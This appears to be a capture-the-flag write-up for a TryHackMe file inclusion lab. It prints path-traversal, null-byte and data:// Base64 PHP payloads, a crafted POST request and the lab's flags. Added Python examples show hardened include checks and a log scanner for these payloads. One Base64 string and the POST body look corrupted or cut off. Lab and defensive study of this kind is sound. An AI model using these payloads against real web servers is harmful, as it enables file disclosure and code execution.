{THM} File Inclusion Room (Challenge) 


Summary 


The following is a documentation of the steps taken to solve the Challenge section 
in the THM File Inclusion Room. The room introduces us to the concepts of Local 
and Remote File Inclusion as well as common techniques employed to facilitate 
such attacks. 


Path Traversal and Filter bypasses are both covered by the content of the room 
and will be used in the solutions to the challenges. 


This document only covers Challenges 1, 2, and 3. 


Challenge 1: 


Objective: 
Capture the flag! 
There is a flag hidden in the folder structure of the host machine: /etc/flag1. 


All we are provided with is a webpage with a single text input field to work 
with. We will need to use the above-mentioned LFI techniques to navigate 
our way to the flag location. 


Solution: 


We start by initiating both the attack box and the VM that will serve as the host 
of the challenges from the THM Room. Next, we navigate our way to challenge 
one on the VM following the provided instructions. 


The first thing we see for this challenge is the hint regarding the request type 
we might need to change in order to achieve our objective. 


File Inclusion Lab 
Lab #Challenge-1: Include a file in the input form below 
The input form is broken! You need to send POST request with 'file' parameter! 
FileName For example: welcome.php 


Next, we will inspect the HTML code to locate and change the request type. To 
do this: 

1. Fn + F12 to open the developer tools in your browser 
2. Navigate to the Inspector menu 
3. Navigate to the Body. You can make use of the highlighting function by 
moving the cursor to the input field and observing which part of the code 
is highlighted as a result. 
4. Next, change the form method from 'GET' to 'POST' 
(Screenshot: the Challenge-1 page "Include a file in the input form below" with the 
FileName field, shown alongside the browser Inspector.) 


Once this is done, we can insert our LFI bypass payload into the text 
field. 

We will re-use the format of escaping four directories to reach /etc, which we 
learned in the room's earlier exercises, and will use the following payload to 
capture the flag: /../../../../etc/flag1 


SPOILER ALERT: 


With this, we have successfully captured our first flag: -1x3d-inpu7-forrn 


Challenge 2: 


Objective: 
Same as the objective for our first challenge - Capture the flag! 


Only this time we don't even have a text field to work with. We are just met by a 
message informing us that only admins can access the page. 


Solution: 
For this one, we will do some cookie manipulation. 
Navigate to the challenge page and again press Fn + F12 to open the developer tools. 

This time around, go to the Storage menu in the dev tools and from there 
to Cookies. 
(Screenshot: the Challenge-2 page reads "Welcome Guest! Only admins can access 
this page!"; the dev tools Storage panel is open on Cookies for 
http://10.10.247.189, showing a cookie named THM.) 
Now if you are anything like me, the next thing you will try is to substitute the Guest 
for admin and specify the path in the Path field of the cookie. Spare yourself the 
effort; this will not work. The admin substitution will grant you a screen that will 
greet you as admin and will display the error, but will not help you any further. 


What we will do instead is to specify our path in the Value field, again reusing the 
structure from the room: 
../../../../etc/flag2 


This gets us here: 
Lab #Challenge-2: Include a file in the input form below 

Current Path 
/var/www/html 

File Content Preview of ../../../../etc/flag2 
Welcome ../../../../etc/flag2 

Warning: include(includes/../../../../etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37 

Warning: include() [function.include]: Failed opening 'includes/../../../../etc/flag2.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37 


So we made it past the admin filter, but no cigar. From the error message, we can 
identify a filter that is appending .php to our value. 

In order to bypass this we will use a NULL BYTE (%00) 
at the end of our input. The null byte terminates the string, so anything the 
application appends after it (the .php extension) is dropped, thereby negating 
the requirement for a PHP file and returning our flag. 
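The traversal from Challenge 1 and the null-byte trick from Challenge 2 both work against the same unsafe pattern, which the warnings above reveal: the user value is concatenated between a fixed "includes/" prefix and ".php". The Python below is an added example, not code from the room or the write-up; it models that composition, shows what path the PHP 5.2-era include would actually open (C-level file functions stopped at the first NUL byte before PHP 5.3.4), and places a hardened check beside it. BASE_DIR is an assumed stand-in directory.

```python
import os

# Constructed stand-in for the lab's include directory. Assumption: the
# warnings in the write-up show the app building "includes/<file>.php".
BASE_DIR = "/var/www/html/includes"

def naive_include_path(user_file: str) -> str:
    """Mirror of the unsafe composition: prefix + user value + '.php'."""
    return os.path.join(BASE_DIR, user_file + ".php")

def legacy_php_open_target(user_file: str) -> str:
    """What a PHP 5.2-era include would actually open: the path is cut at the
    first NUL byte (the null-byte trick) and '..' segments are resolved."""
    truncated = naive_include_path(user_file).split("\x00", 1)[0]
    return os.path.normpath(truncated)

class UnsafeInclude(ValueError):
    pass

_ALLOWED = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-")

def safe_include_path(user_file: str) -> str:
    """Hardened version: reject NUL bytes and any character outside a strict
    allowlist, then confirm the resolved path is still inside BASE_DIR
    (use os.path.realpath in production so symlinks are resolved as well)."""
    if not user_file or "\x00" in user_file:
        raise UnsafeInclude("empty name or NUL byte")
    if any(c not in _ALLOWED for c in user_file):
        raise UnsafeInclude("character outside allowlist")
    candidate = os.path.normpath(os.path.join(BASE_DIR, user_file + ".php"))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise UnsafeInclude("path escapes include directory")
    return candidate

def is_accepted(user_file: str) -> bool:
    """Convenience wrapper: True if the hardened check lets the name through."""
    try:
        safe_include_path(user_file)
        return True
    except UnsafeInclude:
        return False

if __name__ == "__main__":
    for name in ["welcome", "../../../../etc/flag2", "../../../../etc/flag2\x00"]:
        print(repr(name), "->", legacy_php_open_target(name), "| accepted:", is_accepted(name))
```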
SPOILER ALERT: 
After appending the null byte and refreshing you will be rewarded with the flag: 
c00k13_i5_yuMmy1 


Challenge 3: 


Objective: 
Yes, you guessed it - Capture that flag! 


Solution: 


Once more we start with the familiar path as payload in order to see what 
feedback, if any, we will get to aid us ( /../../../../etc/flag3 ). 

The output of this prompt, along with the hints we get from THM, leads us to our 
next steps: 


[Hint#1] Not everything is filtered! [Hint #2] The website uses $_REQUESTS to 
accept HTTP requests. Do research to understand it and what it accepts! 


File Content Preview of etcflag 
Warning: include(etcflag.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall3.php on line 30 

Warning: include() [function.include]: Failed opening 'etcflag.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall3.php on line 30 


We need to change the request type. Let's try to manipulate the HTML in the dev 
tools again. 
Doing this and feeding the same payload returns a different error, but no flag. 


IronHack Write-up 


File Content Preview of /../../../../etc/flag3 
Warning: include(/../../../../etc/flag3.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall3.php on line 49 

Warning: include() [function.include]: Failed opening '/../../../../etc/flag3.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall3.php on line 49 


Changing the request type and including NULL bytes did not reveal the flag for us 
this time. 

The next step that we will take is to deploy the tool called Burp Suite, 
pre-installed on the VM. 

With Burp Suite we can intercept all requests from our machine using the proxy 
function and manipulate them to our heart's desire. 


Quick Burp guide: 
1. Load the program 
2. Click Next on the initiation phases 
3. Navigate to Proxy and enable it 
4. Back to the browser: 
   a. Find the FoxyProxy extension 
   b. Select Burp 


Now your requests will be frozen and captured by Burp - where you can change 
them at will and forward them to the target server. 


When the typical LFI techniques (like path traversal or null byte injection) failed 
due to .php extension appending, we hypothesized that PHP stream wrappers 
could provide a way to bypass these restrictions. 

If certain PHP configurations ( allow_url_include and allow_url_fopen ) were enabled, 
we could use these wrappers to include files or execute code directly from other 
sources like data:// or php://. 

To test our hypothesis about the PHP configuration, we decided to use the data:// 
stream wrapper to execute a phpinfo() command on the server. 




We crafted a Base64-encoded payload: PD9waHAgcGhwaW5mbygpOyA/Pg== , which 
decodes to <?php phpinfo(); ?>. The choice for Base64 and not plaintext was to 
prevent special character interpretation and injection issues. 

GET /challenges///////chall3.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== 
Host: <target-VM-IP> 


The phpinfo() output revealed the entire PHP configuration of the server. 
In the output, we specifically looked for two settings: 

• allow_url_fopen: Controls whether the PHP fopen() and similar functions can 
open remote files. 

• allow_url_include: Controls whether include and require statements can include 
remote files or resources using URLs (like http://, data://). 


File Name For example: welcome 

Current Path 
/var/www/html 

File Content Preview of data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyBzexNOZWOojJ2NhdCAvVZXRjL2ZsYWczJyk7ID8+ 

System Linux f8c5b1a78692 5.15.0-1064-aws #70~20.04.1-Ubuntu SMP Fri Jun 14 15:42:13 UTC 2024 

Server API Apache 2.0 Handler 
Both allow_url_fopen and allow_url_include were set to On in the phpinfo() output. 
Knowing that these settings were enabled allowed us to understand that the 
server could execute code directly from stream wrappers. 

So now our objective is to use the data:// stream wrapper to execute PHP code 
that reads and outputs the contents of the /etc/flag3 file. 
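From the defender's side, the three payload classes used across these challenges (traversal sequences, %00 null bytes, and data:// or php:// stream wrappers in the file parameter) are all visible in web server logs when they arrive in a GET query string. The Python below is an added example, not code from the room or the write-up: it scans constructed Apache-style access-log lines for those indicators after URL-decoding them twice. The log lines and IP addresses are made up; note that the POST request used to finish Challenge 3 carries its payload in the body, which a plain access log does not record.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache-style access-log lines (not from the lab); the requests
# mirror the payload classes in this write-up: traversal, null byte, data://.
SAMPLE_LOG = """\
10.10.1.5 - - [14/Jun/2024:15:42:13 +0000] "GET /challenges/chall1.php?file=welcome HTTP/1.1" 200 512
10.10.1.5 - - [14/Jun/2024:15:42:20 +0000] "POST /challenges/chall1.php HTTP/1.1" 200 640
10.10.1.5 - - [14/Jun/2024:15:43:01 +0000] "GET /challenges/chall2.php?file=../../../../etc/flag2%00 HTTP/1.1" 200 300
10.10.1.5 - - [14/Jun/2024:15:44:09 +0000] "GET /challenges/chall3.php?file=%2e%2e%2f%2e%2e%2fetc%2fflag3 HTTP/1.1" 500 210
10.10.1.5 - - [14/Jun/2024:15:45:30 +0000] "GET /challenges/chall3.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
WRAPPER_RE = re.compile(r'^(data|php|expect|phar|file|https?|ftp):', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def classify_value(raw: str) -> list[str]:
    """Return the LFI indicator classes found in one query-string value."""
    decoded = unquote(unquote(raw))  # decode twice to catch double-encoding
    found = []
    if "\x00" in decoded:
        found.append("null-byte")
    if TRAVERSAL_RE.search(decoded):
        found.append("path-traversal")
    m = WRAPPER_RE.match(decoded)
    if m:
        found.append("stream-wrapper:" + m.group(1).lower())
    return found

def scan_log(text: str) -> list[dict]:
    """Scan access-log lines. Only GET query strings are visible here, so the
    same payload sent in a POST body (as in Challenge 3) is NOT caught."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for pair in (query.split("&") if query else []):
            key, _, value = pair.partition("=")
            found = classify_value(value)
            if found:
                alerts.append({"line": lineno, "ip": m["ip"], "method": m["method"],
                               "param": unquote(key), "indicators": found})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```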


We start with preparing the payload in plain PHP before converting it to Base64 to 
be injected in the request. 


<?php echo file_get_contents('/etc/flag3'); ?> 


The final POST request should look something like this: 

POST /challenges/////chall3.php HTTP/1.1 
Host: 10.10.247.189 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Ge 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, ir 
Accept-Language: en-US, en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Connection: close 
Referer: http://10.10.247.189/challenges////chall3.php 
Upgrade-Insecure-Requests: 1 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 130 

file=data://text/plain;base64,PD9waHAgZWNobyBmaWxlX2dldF9jb250Z\ 


SPOILER ALERT: 

As a reward for our efforts, at the end we should obtain the 3rd flag: 
POst_1s_w0rk1in9 
File Inclusion Lab 
Lab #Challenge 3: Include a file in the input form below 
FileName For example: welcome 

Current Path 
/var/www/html 

File Content Preview of data://text/plain;base64,PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9mbGFnMycpOyA/Pg== 

POst_1s_w0rk1in9 